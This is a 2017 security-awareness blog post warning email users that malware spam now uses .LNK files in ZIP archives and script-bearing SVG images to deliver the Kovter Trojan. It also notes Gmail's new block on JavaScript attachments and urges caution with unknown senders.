• Posted Feb. 7, 2017, 12:12 p.m. - 7 years, 2 months ago

Malware File Types Changing to Look less Suspect

Attack on computerFollowing on from our previous post about the State of Malware report from Malwarebytes last week, a new warning has been released from the Microsoft Malware Protection Center that malware distributors are now using less suspicious and known file types in an attempt to make their emails look more genuine, and as such convince more users to open the files.

PDF, Word, Excel and even Powerpoint are all very common file types to be targeted by malware operators and it’s very important anyone receiving what looks like a fake email to be very cautious of opening any website links and/or attached files without being sure that the sender is genuine. This new wave of spam emails have switched things up a notch, and started to use .LNK files located inside ZIP archives in an attempt to get users to open them. Once opened, the .LNK files execute malicious PowerShell scripts that, in this case, download and install the Kovter click fraud Trojan on the user’s computer.

.SVG image files are another file type becoming more common in the spread of malicious malware. These files can contain JavaScript that is coded to launch downloads once the image is opened, without the user even being aware as all that can be seen is an image inside their browser.

As of February 13th, 2017, Google will be blocking users from attaching JavaScript files to emails in Gmail (either as direct attachments or within archives). This is because JavaScript is one of the most common ways to spread malware. The announcement was made in late January and may mean we see more spam emails being sent with different types of file attachments to overcome this limitation from malicious senders using Gmail accounts.

As always, caution must be the watchword for any email you receive that isn’t from a known sender or source, especially if it has attachements and/or hyperlinks within. LNK files in particular are not known to the majority of regular internet users, and aren’t typically the type of file used to send details on to others, so anything like this will definitely be suspect!